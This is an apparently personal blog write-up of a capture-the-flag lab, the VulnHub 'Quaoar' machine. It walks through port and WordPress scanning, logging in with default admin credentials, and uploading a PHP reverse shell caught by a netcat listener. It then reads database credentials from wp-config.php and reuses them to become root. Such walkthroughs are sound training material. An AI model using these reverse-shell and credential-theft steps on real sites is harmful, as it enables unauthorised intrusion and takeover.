For background information on this series of CTFs you may want to read this page. Or if your just after my solution please keep reading.
This is the first of 3 incrementally difficult CTF’s created for HackFest 2016 by @ViperBlackSkull and released on the VulnHub platform.
Difficulty –Very Easy
As always start with an NMAP Scan to see what ports are open
root@kali:~/VulnHub/quaoar# nmap -p- -Pn -v -T4 -A 192.168.5.11 . . . SNIP . . . Scanning 192.168.5.11 [65535 ports] Discovered open port 22/tcp on 192.168.5.11 Discovered open port 80/tcp on 192.168.5.11 Discovered open port 993/tcp on 192.168.5.11 Discovered open port 110/tcp on 192.168.5.11 Discovered open port 995/tcp on 192.168.5.11 Discovered open port 139/tcp on 192.168.5.11 Discovered open port 143/tcp on 192.168.5.11 Discovered open port 53/tcp on 192.168.5.11 Discovered open port 445/tcp on 192.168.5.11 . . . SNIP . . .
Plenty there but lets start with the web services. on Port 80
Loading the page in a browser gives us a splash screen and a couple of images, not much else.
So throw nikto at it to see what we can find.
The most interesting point it returned was:
Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
Loading the page shows us a basic WordPress install.
Kali comes with a tool to scan WordPress sites. wpscan. This tool is capable of enumerate users and plugins and can show you if there are vulnerabilities associated with version numbers it discovers.
root@TechKali:~# wpscan -u http://192.168.5.11/wordpress -e u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.9.2 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ [+] URL: http://192.168.5.11/wordpress/ [+] Started: Tue Mar 21 19:26:36 2017 [!] The WordPress 'http://192.168.5.11/wordpress/readme.html' file exists exposing a version number [+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu) [+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3 [+] XML-RPC Interface available under: http://192.168.5.11/wordpress/xmlrpc.php [!] Upload directory has directory listing enabled: http://192.168.5.11/wordpress/wp-content/uploads/ [!] Includes directory has directory listing enabled: http://192.168.5.11/wordpress/wp-includes/ [+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers [!] 8 vulnerabilities identified from the version number
Most of the vulnerabilities are XSS or CSRF but there is an SQL Injection listed.
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8730 Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/ Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611 [i] Fixed in: 3.9.16
And a list of usernames
[+] Enumerating plugins from passive detection ... [+] No plugins found [+] Enumerating usernames ... [+] Identified the following 2 user/s: +----+--------+--------+ | Id | Login | Name | +----+--------+--------+ | 1 | admin | admin | | 2 | wpuser | wpuser | +----+--------+--------+ [!] Default first WordPress username 'admin' is still used
I started looking for more details on the SQLi but couldnt find a lot of detailed information. It looks like it needed to be coupled with a plugin the mishandles post type names.
While i was researching i figured i may as well throw some creds at the logon form. Hydra is capable of doing this, but i like to use ZAP for its ease of use and feedback.
Username admin password admin makes this one easy.
If you have admin access to a wordpress install the easiest thing to do is just to upload a php reverse shell. I like to use the one from pentest monkey thats included in Kali.
Start by copying the file, edit it using your fav editor to change the callback IP and port. Then set a netcat listener.
root@kali:~/VulnHub/quaoar# cp /usr/share/webshells/php/php-reverse-shell.php shell.php root@kali:~/VulnHub/quaoar# nano shell.php root@kali:~/VulnHub/quaoar# nc -l -vv -p 1234 listening on [any] 1234 ...
Back on WordPress select the plugin page from the left hand menu, click ‘Add New’ and look for the link to upload a plugin in zip format.
After clicking this link select and upload your php page.
Ignore any errors that are generated on the next page and click on Media from the left hand menu. You should see your php file listed. Click the file in the browser to show its details and get the link from the description or URL fields. In my case its ‘/wordpress/wp-content/uploads/2017/04/shell.php’.
Double check your netcat listener is still active and visit this page in a browser. With any luck you should see a connection in netcat.
root@kali:~/VulnHub/quaoar# nc -l -vv -p 1234 listening on [any] 1234 ... 192.168.5.11: inverse host lookup failed: Unknown host connect to [10.0.8.2] from (UNKNOWN) [192.168.5.11] 48435 Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 athlon i386 GNU/Linux 16:20:17 up 5:40, 0 users, load average: 0.29, 0.13, 0.07 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $
One of the first things i do when i get a limited shell, is spawn a python tty shell and get a file listing of the box. In this instance i write it out to the web dir so i can transfer files back to me from the browser
root@kali:~/VulnHub/quaoar# nc -l -vv -p 1234 listening on [any] 1234 ... 192.168.5.11: inverse host lookup failed: Unknown host connect to [10.0.8.2] from (UNKNOWN) [192.168.5.11] 48435 Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 athlon i386 GNU/Linux 16:20:17 up 5:40, 0 users, load average: 0.29, 0.13, 0.07 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@Quaoar:/$ find / > /var/www/dirs.txt
We are looking for flags so a quick grep in the dirs.txt gives us one.
www-data@Quaoar:/$ cat /home/wpadmin/flag.txt cat /home/wpadmin/flag.txt 2bafe61f03117ac66a73c3c514de796e www-data@Quaoar:/$
Now lets see what we have that can get us escalated privileges. WordPress is connected to mysql and we can read the credentials from the wp-config.php file.
If you didn’t know where it was you could search for it in the dirs.txt but either way:
www-data@Quaoar:/$ cat /var/www/wordpress/wp-config.php cat /var/www/wordpress/wp-config.php . . . SNIP . . . // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'rootpassword!'); /** MySQL hostname */ define('DB_HOST', 'localhost'); . . . SNIP . . .
Password reuse is fairly common and in this case its no exception. The sql root password is the same as the host root password.
www-data@Quaoar:/$ su su Password: rootpassword! root@Quaoar:/# id id uid=0(root) gid=0(root) groups=0(root) root@Quaoar:/#
Now we have root we have a second flag in /root/flag.txt
root@Quaoar:/# find / -name flag.txt find / -name flag.txt /root/flag.txt /home/wpadmin/flag.txt root@Quaoar:/# cat /root/flag.txt cat /root/flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb root@Quaoar:/#
Well that’s it for this one. Difficulty was spot on. Very Easy. On the next one.
As usual Questions, Queries, Comments below.